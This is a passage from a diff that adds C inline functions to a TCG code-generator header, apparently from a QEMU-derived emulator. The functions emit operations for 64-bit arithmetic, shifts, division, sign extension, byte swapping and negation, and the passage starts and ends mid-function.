TCGV_HIGH(t0), + TCGV_LOW(arg1), TCGV_LOW(arg2)); + } + + tcg_gen_mul_i32(s, t1, TCGV_LOW(arg1), TCGV_HIGH(arg2)); + tcg_gen_add_i32(s, TCGV_HIGH(t0), TCGV_HIGH(t0), t1); + tcg_gen_mul_i32(s, t1, TCGV_HIGH(arg1), TCGV_LOW(arg2)); + tcg_gen_add_i32(s, TCGV_HIGH(t0), TCGV_HIGH(t0), t1); + + tcg_gen_mov_i64(s, ret, t0); + tcg_temp_free_i64(s, t0); + tcg_temp_free_i32(s, t1); +} + +static inline void tcg_gen_div_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + gen_helper_div_i64(s, ret, arg1, arg2); +} + +static inline void tcg_gen_rem_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + gen_helper_rem_i64(s, ret, arg1, arg2); +} + +static inline void tcg_gen_divu_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + gen_helper_divu_i64(s, ret, arg1, arg2); +} + +static inline void tcg_gen_remu_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + gen_helper_remu_i64(s, ret, arg1, arg2); +} + +#else + +static inline void tcg_gen_mov_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + if (!TCGV_EQUAL_I64(ret, arg)) + tcg_gen_op2_i64(s, INDEX_op_mov_i64, ret, arg); +} + +static inline void tcg_gen_movi_i64(TCGContext *s, TCGv_i64 ret, int64_t arg) +{ + tcg_gen_op2i_i64(s, INDEX_op_movi_i64, ret, arg); +} + +static inline void tcg_gen_ld8u_i64(TCGContext *s, TCGv_i64 ret, TCGv_ptr arg2, + tcg_target_long offset) +{ + tcg_gen_ldst_op_i64(s, INDEX_op_ld8u_i64, ret, arg2, offset); +} + +static inline void tcg_gen_ld8s_i64(TCGContext *s, TCGv_i64 ret, TCGv_ptr arg2, + tcg_target_long offset) +{ + tcg_gen_ldst_op_i64(s, INDEX_op_ld8s_i64, ret, arg2, offset); +} + +static inline void tcg_gen_ld16u_i64(TCGContext *s, TCGv_i64 ret, TCGv_ptr arg2, + tcg_target_long offset) +{ + tcg_gen_ldst_op_i64(s, INDEX_op_ld16u_i64, ret, arg2, offset); +} + +static inline void tcg_gen_ld16s_i64(TCGContext *s, TCGv_i64 ret, TCGv_ptr arg2, + tcg_target_long offset) +{ + tcg_gen_ldst_op_i64(s, INDEX_op_ld16s_i64, ret, arg2, offset); +} + +static inline void tcg_gen_ld32u_i64(TCGContext *s, TCGv_i64 ret, TCGv_ptr arg2, + tcg_target_long offset) +{ + tcg_gen_ldst_op_i64(s, INDEX_op_ld32u_i64, ret, arg2, offset); +} + +static inline void tcg_gen_ld32s_i64(TCGContext *s, TCGv_i64 ret, TCGv_ptr arg2, + tcg_target_long offset) +{ + tcg_gen_ldst_op_i64(s, INDEX_op_ld32s_i64, ret, arg2, offset); +} + +static inline void tcg_gen_ld_i64(TCGContext *s, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset) +{ + tcg_gen_ldst_op_i64(s, INDEX_op_ld_i64, ret, arg2, offset); +} + +static inline void tcg_gen_st8_i64(TCGContext *s, TCGv_i64 arg1, TCGv_ptr arg2, + tcg_target_long offset) +{ + tcg_gen_ldst_op_i64(s, INDEX_op_st8_i64, arg1, arg2, offset); +} + +static inline void tcg_gen_st16_i64(TCGContext *s, TCGv_i64 arg1, TCGv_ptr arg2, + tcg_target_long offset) +{ + tcg_gen_ldst_op_i64(s, INDEX_op_st16_i64, arg1, arg2, offset); +} + +static inline void tcg_gen_st32_i64(TCGContext *s, TCGv_i64 arg1, TCGv_ptr arg2, + tcg_target_long offset) +{ + tcg_gen_ldst_op_i64(s, INDEX_op_st32_i64, arg1, arg2, offset); +} + +static inline void tcg_gen_st_i64(TCGContext *s, TCGv_i64 arg1, TCGv_ptr arg2, tcg_target_long offset) +{ + tcg_gen_ldst_op_i64(s, INDEX_op_st_i64, arg1, arg2, offset); +} + +static inline void tcg_gen_add_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + tcg_gen_op3_i64(s, INDEX_op_add_i64, ret, arg1, arg2); +} + +static inline void tcg_gen_sub_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + tcg_gen_op3_i64(s, INDEX_op_sub_i64, ret, arg1, arg2); +} + +static inline void tcg_gen_and_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + if (TCGV_EQUAL_I64(arg1, arg2)) { + tcg_gen_mov_i64(s, ret, arg1); + } else { + tcg_gen_op3_i64(s, INDEX_op_and_i64, ret, arg1, arg2); + } +} + +static inline void tcg_gen_andi_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, uint64_t arg2) +{ + TCGv_i64 t0; + /* Some cases can be optimized here. */ + switch (arg2) { + case 0: + tcg_gen_movi_i64(s, ret, 0); + return; + case 0xffffffffffffffffull: + tcg_gen_mov_i64(s, ret, arg1); + return; + case 0xffull: + /* Don't recurse with tcg_gen_ext8u_i32. */ + if (TCG_TARGET_HAS_ext8u_i64) { + tcg_gen_op2_i64(s, INDEX_op_ext8u_i64, ret, arg1); + return; + } + break; + case 0xffffu: + if (TCG_TARGET_HAS_ext16u_i64) { + tcg_gen_op2_i64(s, INDEX_op_ext16u_i64, ret, arg1); + return; + } + break; + case 0xffffffffull: + if (TCG_TARGET_HAS_ext32u_i64) { + tcg_gen_op2_i64(s, INDEX_op_ext32u_i64, ret, arg1); + return; + } + break; + } + t0 = tcg_const_i64(s, arg2); + tcg_gen_and_i64(s, ret, arg1, t0); + tcg_temp_free_i64(s, t0); +} + +static inline void tcg_gen_or_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + if (TCGV_EQUAL_I64(arg1, arg2)) { + tcg_gen_mov_i64(s, ret, arg1); + } else { + tcg_gen_op3_i64(s, INDEX_op_or_i64, ret, arg1, arg2); + } +} + +static inline void tcg_gen_ori_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) +{ + /* Some cases can be optimized here. */ + if (arg2 == -1) { + tcg_gen_movi_i64(s, ret, -1); + } else if (arg2 == 0) { + tcg_gen_mov_i64(s, ret, arg1); + } else { + TCGv_i64 t0 = tcg_const_i64(s, arg2); + tcg_gen_or_i64(s, ret, arg1, t0); + tcg_temp_free_i64(s, t0); + } +} + +static inline void tcg_gen_xor_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + if (TCGV_EQUAL_I64(arg1, arg2)) { + tcg_gen_movi_i64(s, ret, 0); + } else { + tcg_gen_op3_i64(s, INDEX_op_xor_i64, ret, arg1, arg2); + } +} + +static inline void tcg_gen_xori_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) +{ + /* Some cases can be optimized here. */ + if (arg2 == 0) { + tcg_gen_mov_i64(s, ret, arg1); + } else if (arg2 == -1 && TCG_TARGET_HAS_not_i64) { + /* Don't recurse with tcg_gen_not_i64. */ + tcg_gen_op2_i64(s, INDEX_op_not_i64, ret, arg1); + } else { + TCGv_i64 t0 = tcg_const_i64(s, arg2); + tcg_gen_xor_i64(s, ret, arg1, t0); + tcg_temp_free_i64(s, t0); + } +} + +static inline void tcg_gen_shl_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + tcg_gen_op3_i64(s, INDEX_op_shl_i64, ret, arg1, arg2); +} + +static inline void tcg_gen_shli_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) +{ + if (arg2 == 0) { + tcg_gen_mov_i64(s, ret, arg1); + } else { + TCGv_i64 t0 = tcg_const_i64(s, arg2); + tcg_gen_shl_i64(s, ret, arg1, t0); + tcg_temp_free_i64(s, t0); + } +} + +static inline void tcg_gen_shr_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + tcg_gen_op3_i64(s, INDEX_op_shr_i64, ret, arg1, arg2); +} + +static inline void tcg_gen_shri_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) +{ + if (arg2 == 0) { + tcg_gen_mov_i64(s, ret, arg1); + } else { + TCGv_i64 t0 = tcg_const_i64(s, arg2); + tcg_gen_shr_i64(s, ret, arg1, t0); + tcg_temp_free_i64(s, t0); + } +} + +static inline void tcg_gen_sar_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + tcg_gen_op3_i64(s, INDEX_op_sar_i64, ret, arg1, arg2); +} + +static inline void tcg_gen_sari_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) +{ + if (arg2 == 0) { + tcg_gen_mov_i64(s, ret, arg1); + } else { + TCGv_i64 t0 = tcg_const_i64(s, arg2); + tcg_gen_sar_i64(s, ret, arg1, t0); + tcg_temp_free_i64(s, t0); + } +} + +static inline void tcg_gen_brcond_i64(TCGContext *s, TCGCond cond, TCGv_i64 arg1, + TCGv_i64 arg2, int label_index) +{ + if (cond == TCG_COND_ALWAYS) { + tcg_gen_br(s, label_index); + } else if (cond != TCG_COND_NEVER) { + tcg_gen_op4ii_i64(s, INDEX_op_brcond_i64, arg1, arg2, cond, label_index); + } +} + +static inline void tcg_gen_setcond_i64(TCGContext *s, TCGCond cond, TCGv_i64 ret, + TCGv_i64 arg1, TCGv_i64 arg2) +{ + if (cond == TCG_COND_ALWAYS) { + tcg_gen_movi_i64(s, ret, 1); + } else if (cond == TCG_COND_NEVER) { + tcg_gen_movi_i64(s, ret, 0); + } else { + tcg_gen_op4i_i64(s, INDEX_op_setcond_i64, ret, arg1, arg2, cond); + } +} + +static inline void tcg_gen_mul_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + tcg_gen_op3_i64(s, INDEX_op_mul_i64, ret, arg1, arg2); +} + +static inline void tcg_gen_div_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + if (TCG_TARGET_HAS_div_i64) { + tcg_gen_op3_i64(s, INDEX_op_div_i64, ret, arg1, arg2); + } else if (TCG_TARGET_HAS_div2_i64) { + TCGv_i64 t0 = tcg_temp_new_i64(s); + tcg_gen_sari_i64(s, t0, arg1, 63); + tcg_gen_op5_i64(s, INDEX_op_div2_i64, ret, t0, arg1, t0, arg2); + tcg_temp_free_i64(s, t0); + } else { + gen_helper_div_i64(s, ret, arg1, arg2); + } +} + +static inline void tcg_gen_rem_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + if (TCG_TARGET_HAS_rem_i64) { + tcg_gen_op3_i64(s, INDEX_op_rem_i64, ret, arg1, arg2); + } else if (TCG_TARGET_HAS_div_i64) { + TCGv_i64 t0 = tcg_temp_new_i64(s); + tcg_gen_op3_i64(s, INDEX_op_div_i64, t0, arg1, arg2); + tcg_gen_mul_i64(s, t0, t0, arg2); + tcg_gen_sub_i64(s, ret, arg1, t0); + tcg_temp_free_i64(s, t0); + } else if (TCG_TARGET_HAS_div2_i64) { + TCGv_i64 t0 = tcg_temp_new_i64(s); + tcg_gen_sari_i64(s, t0, arg1, 63); + tcg_gen_op5_i64(s, INDEX_op_div2_i64, t0, ret, arg1, t0, arg2); + tcg_temp_free_i64(s, t0); + } else { + gen_helper_rem_i64(s, ret, arg1, arg2); + } +} + +static inline void tcg_gen_divu_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + if (TCG_TARGET_HAS_div_i64) { + tcg_gen_op3_i64(s, INDEX_op_divu_i64, ret, arg1, arg2); + } else if (TCG_TARGET_HAS_div2_i64) { + TCGv_i64 t0 = tcg_temp_new_i64(s); + tcg_gen_movi_i64(s, t0, 0); + tcg_gen_op5_i64(s, INDEX_op_divu2_i64, ret, t0, arg1, t0, arg2); + tcg_temp_free_i64(s, t0); + } else { + gen_helper_divu_i64(s, ret, arg1, arg2); + } +} + +static inline void tcg_gen_remu_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + if (TCG_TARGET_HAS_rem_i64) { + tcg_gen_op3_i64(s, INDEX_op_remu_i64, ret, arg1, arg2); + } else if (TCG_TARGET_HAS_div_i64) { + TCGv_i64 t0 = tcg_temp_new_i64(s); + tcg_gen_op3_i64(s, INDEX_op_divu_i64, t0, arg1, arg2); + tcg_gen_mul_i64(s, t0, t0, arg2); + tcg_gen_sub_i64(s, ret, arg1, t0); + tcg_temp_free_i64(s, t0); + } else if (TCG_TARGET_HAS_div2_i64) { + TCGv_i64 t0 = tcg_temp_new_i64(s); + tcg_gen_movi_i64(s, t0, 0); + tcg_gen_op5_i64(s, INDEX_op_divu2_i64, t0, ret, arg1, t0, arg2); + tcg_temp_free_i64(s, t0); + } else { + gen_helper_remu_i64(s, ret, arg1, arg2); + } +} +#endif /* TCG_TARGET_REG_BITS == 32 */ + +static inline void tcg_gen_addi_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) +{ + /* some cases can be optimized here */ + if (arg2 == 0) { + tcg_gen_mov_i64(s, ret, arg1); + } else { + TCGv_i64 t0 = tcg_const_i64(s, arg2); + tcg_gen_add_i64(s, ret, arg1, t0); + tcg_temp_free_i64(s, t0); + } +} + +static inline void tcg_gen_subfi_i64(TCGContext *s, TCGv_i64 ret, int64_t arg1, TCGv_i64 arg2) +{ + TCGv_i64 t0 = tcg_const_i64(s, arg1); + tcg_gen_sub_i64(s, ret, t0, arg2); + tcg_temp_free_i64(s, t0); +} + +static inline void tcg_gen_subi_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) +{ + /* some cases can be optimized here */ + if (arg2 == 0) { + tcg_gen_mov_i64(s, ret, arg1); + } else { + TCGv_i64 t0 = tcg_const_i64(s, arg2); + tcg_gen_sub_i64(s, ret, arg1, t0); + tcg_temp_free_i64(s, t0); + } +} +static inline void tcg_gen_brcondi_i64(TCGContext *s, TCGCond cond, TCGv_i64 arg1, + int64_t arg2, int label_index) +{ + if (cond == TCG_COND_ALWAYS) { + tcg_gen_br(s, label_index); + } else if (cond != TCG_COND_NEVER) { + TCGv_i64 t0 = tcg_const_i64(s, arg2); + tcg_gen_brcond_i64(s, cond, arg1, t0, label_index); + tcg_temp_free_i64(s, t0); + } +} + +static inline void tcg_gen_setcondi_i64(TCGContext *s, TCGCond cond, TCGv_i64 ret, + TCGv_i64 arg1, int64_t arg2) +{ + TCGv_i64 t0 = tcg_const_i64(s, arg2); + tcg_gen_setcond_i64(s, cond, ret, arg1, t0); + tcg_temp_free_i64(s, t0); +} + +static inline void tcg_gen_muli_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) +{ + TCGv_i64 t0 = tcg_const_i64(s, arg2); + tcg_gen_mul_i64(s, ret, arg1, t0); + tcg_temp_free_i64(s, t0); +} + + +/***************************************/ +/* optional operations */ + +static inline void tcg_gen_ext8s_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg) +{ + if (TCG_TARGET_HAS_ext8s_i32) { + tcg_gen_op2_i32(s, INDEX_op_ext8s_i32, ret, arg); + } else { + tcg_gen_shli_i32(s, ret, arg, 24); + tcg_gen_sari_i32(s, ret, ret, 24); + } +} + +static inline void tcg_gen_ext16s_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg) +{ + if (TCG_TARGET_HAS_ext16s_i32) { + tcg_gen_op2_i32(s, INDEX_op_ext16s_i32, ret, arg); + } else { + tcg_gen_shli_i32(s, ret, arg, 16); + tcg_gen_sari_i32(s, ret, ret, 16); + } +} + +static inline void tcg_gen_ext8u_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg) +{ + if (TCG_TARGET_HAS_ext8u_i32) { + tcg_gen_op2_i32(s, INDEX_op_ext8u_i32, ret, arg); + } else { + tcg_gen_andi_i32(s, ret, arg, 0xffu); + } +} + +static inline void tcg_gen_ext16u_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg) +{ + if (TCG_TARGET_HAS_ext16u_i32) { + tcg_gen_op2_i32(s, INDEX_op_ext16u_i32, ret, arg); + } else { + tcg_gen_andi_i32(s, ret, arg, 0xffffu); + } +} + +/* Note: we assume the two high bytes are set to zero */ +static inline void tcg_gen_bswap16_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg) +{ + if (TCG_TARGET_HAS_bswap16_i32) { + tcg_gen_op2_i32(s, INDEX_op_bswap16_i32, ret, arg); + } else { + TCGv_i32 t0 = tcg_temp_new_i32(s); + + tcg_gen_ext8u_i32(s, t0, arg); + tcg_gen_shli_i32(s, t0, t0, 8); + tcg_gen_shri_i32(s, ret, arg, 8); + tcg_gen_or_i32(s, ret, ret, t0); + tcg_temp_free_i32(s, t0); + } +} + +static inline void tcg_gen_bswap32_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg) +{ + if (TCG_TARGET_HAS_bswap32_i32) { + tcg_gen_op2_i32(s, INDEX_op_bswap32_i32, ret, arg); + } else { + TCGv_i32 t0, t1; + t0 = tcg_temp_new_i32(s); + t1 = tcg_temp_new_i32(s); + + tcg_gen_shli_i32(s, t0, arg, 24); + + tcg_gen_andi_i32(s, t1, arg, 0x0000ff00); + tcg_gen_shli_i32(s, t1, t1, 8); + tcg_gen_or_i32(s, t0, t0, t1); + + tcg_gen_shri_i32(s, t1, arg, 8); + tcg_gen_andi_i32(s, t1, t1, 0x0000ff00); + tcg_gen_or_i32(s, t0, t0, t1); + + tcg_gen_shri_i32(s, t1, arg, 24); + tcg_gen_or_i32(s, ret, t0, t1); + tcg_temp_free_i32(s, t0); + tcg_temp_free_i32(s, t1); + } +} + +#if TCG_TARGET_REG_BITS == 32 +static inline void tcg_gen_ext8s_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + tcg_gen_ext8s_i32(s, TCGV_LOW(ret), TCGV_LOW(arg)); + tcg_gen_sari_i32(s, TCGV_HIGH(ret), TCGV_LOW(ret), 31); +} + +static inline void tcg_gen_ext16s_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + tcg_gen_ext16s_i32(s, TCGV_LOW(ret), TCGV_LOW(arg)); + tcg_gen_sari_i32(s, TCGV_HIGH(ret), TCGV_LOW(ret), 31); +} + +static inline void tcg_gen_ext32s_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + tcg_gen_mov_i32(s, TCGV_LOW(ret), TCGV_LOW(arg)); + tcg_gen_sari_i32(s, TCGV_HIGH(ret), TCGV_LOW(ret), 31); +} + +static inline void tcg_gen_ext8u_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + tcg_gen_ext8u_i32(s, TCGV_LOW(ret), TCGV_LOW(arg)); + tcg_gen_movi_i32(s, TCGV_HIGH(ret), 0); +} + +static inline void tcg_gen_ext16u_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + tcg_gen_ext16u_i32(s, TCGV_LOW(ret), TCGV_LOW(arg)); + tcg_gen_movi_i32(s, TCGV_HIGH(ret), 0); +} + +static inline void tcg_gen_ext32u_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + tcg_gen_mov_i32(s, TCGV_LOW(ret), TCGV_LOW(arg)); + tcg_gen_movi_i32(s, TCGV_HIGH(ret), 0); +} + +static inline void tcg_gen_trunc_shr_i64_i32(TCGContext *s, TCGv_i32 ret, TCGv_i64 arg, + unsigned int count) +{ + tcg_debug_assert(count < 64); + if (count >= 32) { + tcg_gen_shri_i32(s, ret, TCGV_HIGH(arg), count - 32); + } else if (count == 0) { + tcg_gen_mov_i32(s, ret, TCGV_LOW(arg)); + } else { + TCGv_i64 t = tcg_temp_new_i64(s); + tcg_gen_shri_i64(s, t, arg, count); + tcg_gen_mov_i32(s, ret, TCGV_LOW(t)); + tcg_temp_free_i64(s, t); + } +} + +static inline void tcg_gen_extu_i32_i64(TCGContext *s, TCGv_i64 ret, TCGv_i32 arg) +{ + tcg_gen_mov_i32(s, TCGV_LOW(ret), arg); + tcg_gen_movi_i32(s, TCGV_HIGH(ret), 0); +} + +static inline void tcg_gen_ext_i32_i64(TCGContext *s, TCGv_i64 ret, TCGv_i32 arg) +{ + tcg_gen_mov_i32(s, TCGV_LOW(ret), arg); + tcg_gen_sari_i32(s, TCGV_HIGH(ret), TCGV_LOW(ret), 31); +} + +/* Note: we assume the six high bytes are set to zero */ +static inline void tcg_gen_bswap16_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + tcg_gen_mov_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg)); + tcg_gen_bswap16_i32(s, TCGV_LOW(ret), TCGV_LOW(arg)); +} + +/* Note: we assume the four high bytes are set to zero */ +static inline void tcg_gen_bswap32_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + tcg_gen_mov_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg)); + tcg_gen_bswap32_i32(s, TCGV_LOW(ret), TCGV_LOW(arg)); +} + +static inline void tcg_gen_bswap64_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + TCGv_i32 t0, t1; + t0 = tcg_temp_new_i32(s); + t1 = tcg_temp_new_i32(s); + + tcg_gen_bswap32_i32(s, t0, TCGV_LOW(arg)); + tcg_gen_bswap32_i32(s, t1, TCGV_HIGH(arg)); + tcg_gen_mov_i32(s, TCGV_LOW(ret), t1); + tcg_gen_mov_i32(s, TCGV_HIGH(ret), t0); + tcg_temp_free_i32(s, t0); + tcg_temp_free_i32(s, t1); +} +#else + +static inline void tcg_gen_ext8s_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + if (TCG_TARGET_HAS_ext8s_i64) { + tcg_gen_op2_i64(s, INDEX_op_ext8s_i64, ret, arg); + } else { + tcg_gen_shli_i64(s, ret, arg, 56); + tcg_gen_sari_i64(s, ret, ret, 56); + } +} + +static inline void tcg_gen_ext16s_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + if (TCG_TARGET_HAS_ext16s_i64) { + tcg_gen_op2_i64(s, INDEX_op_ext16s_i64, ret, arg); + } else { + tcg_gen_shli_i64(s, ret, arg, 48); + tcg_gen_sari_i64(s, ret, ret, 48); + } +} + +static inline void tcg_gen_ext32s_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + if (TCG_TARGET_HAS_ext32s_i64) { + tcg_gen_op2_i64(s, INDEX_op_ext32s_i64, ret, arg); + } else { + tcg_gen_shli_i64(s, ret, arg, 32); + tcg_gen_sari_i64(s, ret, ret, 32); + } +} + +static inline void tcg_gen_ext8u_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + if (TCG_TARGET_HAS_ext8u_i64) { + tcg_gen_op2_i64(s, INDEX_op_ext8u_i64, ret, arg); + } else { + tcg_gen_andi_i64(s, ret, arg, 0xffu); + } +} + +static inline void tcg_gen_ext16u_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + if (TCG_TARGET_HAS_ext16u_i64) { + tcg_gen_op2_i64(s, INDEX_op_ext16u_i64, ret, arg); + } else { + tcg_gen_andi_i64(s, ret, arg, 0xffffu); + } +} + +static inline void tcg_gen_ext32u_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + if (TCG_TARGET_HAS_ext32u_i64) { + tcg_gen_op2_i64(s, INDEX_op_ext32u_i64, ret, arg); + } else { + tcg_gen_andi_i64(s, ret, arg, 0xffffffffu); + } +} + +static inline void tcg_gen_trunc_shr_i64_i32(TCGContext *s, TCGv_i32 ret, TCGv_i64 arg, + unsigned int count) +{ + tcg_debug_assert(count < 64); + if (TCG_TARGET_HAS_trunc_shr_i32) { + tcg_gen_op3i_i32(s, INDEX_op_trunc_shr_i32, ret, + MAKE_TCGV_I32(GET_TCGV_I64(arg)), count); + } else if (count == 0) { + tcg_gen_mov_i32(s, ret, MAKE_TCGV_I32(GET_TCGV_I64(arg))); + } else { + TCGv_i64 t = tcg_temp_new_i64(s); + tcg_gen_shri_i64(s, t, arg, count); + tcg_gen_mov_i32(s, ret, MAKE_TCGV_I32(GET_TCGV_I64(t))); + tcg_temp_free_i64(s, t); + } +} + +/* Note: we assume the target supports move between 32 and 64 bit + registers */ +static inline void tcg_gen_extu_i32_i64(TCGContext *s, TCGv_i64 ret, TCGv_i32 arg) +{ + tcg_gen_ext32u_i64(s, ret, MAKE_TCGV_I64(GET_TCGV_I32(arg))); +} + +/* Note: we assume the target supports move between 32 and 64 bit + registers */ +static inline void tcg_gen_ext_i32_i64(TCGContext *s, TCGv_i64 ret, TCGv_i32 arg) +{ + tcg_gen_ext32s_i64(s, ret, MAKE_TCGV_I64(GET_TCGV_I32(arg))); +} + +/* Note: we assume the six high bytes are set to zero */ +static inline void tcg_gen_bswap16_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + if (TCG_TARGET_HAS_bswap16_i64) { + tcg_gen_op2_i64(s, INDEX_op_bswap16_i64, ret, arg); + } else { + TCGv_i64 t0 = tcg_temp_new_i64(s); + + tcg_gen_ext8u_i64(s, t0, arg); + tcg_gen_shli_i64(s, t0, t0, 8); + tcg_gen_shri_i64(s, ret, arg, 8); + tcg_gen_or_i64(s, ret, ret, t0); + tcg_temp_free_i64(s, t0); + } +} + +/* Note: we assume the four high bytes are set to zero */ +static inline void tcg_gen_bswap32_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + if (TCG_TARGET_HAS_bswap32_i64) { + tcg_gen_op2_i64(s, INDEX_op_bswap32_i64, ret, arg); + } else { + TCGv_i64 t0, t1; + t0 = tcg_temp_new_i64(s); + t1 = tcg_temp_new_i64(s); + + tcg_gen_shli_i64(s, t0, arg, 24); + tcg_gen_ext32u_i64(s, t0, t0); + + tcg_gen_andi_i64(s, t1, arg, 0x0000ff00); + tcg_gen_shli_i64(s, t1, t1, 8); + tcg_gen_or_i64(s, t0, t0, t1); + + tcg_gen_shri_i64(s, t1, arg, 8); + tcg_gen_andi_i64(s, t1, t1, 0x0000ff00); + tcg_gen_or_i64(s, t0, t0, t1); + + tcg_gen_shri_i64(s, t1, arg, 24); + tcg_gen_or_i64(s, ret, t0, t1); + tcg_temp_free_i64(s, t0); + tcg_temp_free_i64(s, t1); + } +} + +static inline void tcg_gen_bswap64_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + if (TCG_TARGET_HAS_bswap64_i64) { + tcg_gen_op2_i64(s, INDEX_op_bswap64_i64, ret, arg); + } else { + TCGv_i64 t0 = tcg_temp_new_i64(s); + TCGv_i64 t1 = tcg_temp_new_i64(s); + + tcg_gen_shli_i64(s, t0, arg, 56); + + tcg_gen_andi_i64(s, t1, arg, 0x0000ff00); + tcg_gen_shli_i64(s, t1, t1, 40); + tcg_gen_or_i64(s, t0, t0, t1); + + tcg_gen_andi_i64(s, t1, arg, 0x00ff0000); + tcg_gen_shli_i64(s, t1, t1, 24); + tcg_gen_or_i64(s, t0, t0, t1); + + tcg_gen_andi_i64(s, t1, arg, 0xff000000); + tcg_gen_shli_i64(s, t1, t1, 8); + tcg_gen_or_i64(s, t0, t0, t1); + + tcg_gen_shri_i64(s, t1, arg, 8); + tcg_gen_andi_i64(s, t1, t1, 0xff000000); + tcg_gen_or_i64(s, t0, t0, t1); + + tcg_gen_shri_i64(s, t1, arg, 24); + tcg_gen_andi_i64(s, t1, t1, 0x00ff0000); + tcg_gen_or_i64(s, t0, t0, t1); + + tcg_gen_shri_i64(s, t1, arg, 40); + tcg_gen_andi_i64(s, t1, t1, 0x0000ff00); + tcg_gen_or_i64(s, t0, t0, t1); + + tcg_gen_shri_i64(s, t1, arg, 56); + tcg_gen_or_i64(s, ret, t0, t1); + tcg_temp_free_i64(s, t0); + tcg_temp_free_i64(s, t1); + } +} + +#endif + +static inline void tcg_gen_neg_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg) +{ + if (TCG_TARGET_HAS_neg_i32) { + tcg_gen_op2_i32(s, INDEX_op_neg_i32, ret, arg); + } else { + TCGv_i32 t0 = tcg_const_i32(s, 0); + tcg_gen_sub_i32(s, ret, t0, arg); + tcg_temp_free_i32(s, t0); + } +} + +static inline void tcg_gen_neg_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + if (TCG_TARGET_HAS_neg_i64) { + tcg_gen_op2_i64(s, INDEX_op_neg_i64, ret, arg); + } else { + TCGv_i64 t0 = tcg_const_i64(s, 0); + tcg_gen_sub_i64(s, ret, t0, arg); + tcg_temp_free_i64(s, t0); + } +} + +static inline void tcg_gen_not_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg) +{ + if (TCG_TARGET_HAS_not_i32) { + tcg_gen_op2_i32(s, INDEX_op_not_i32, ret, arg); + } else { + tcg_gen_xori_i32(s, ret, arg, -1); + } +} + +static inline void tcg_gen_not_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ +#if TCG_TARGET_REG_BITS == 64 + if (TCG_TARGET_HAS_not_i64) { + tcg_gen_op2_i64(s, INDEX_op_not_i64, ret, arg); + } else { + tcg_gen_xori_i64(s, ret, arg, -1); + } +#else + tcg_gen_not_i32(s, TCGV_LOW(ret), TCGV_LOW(arg)); + tcg_gen_not_i32(s, 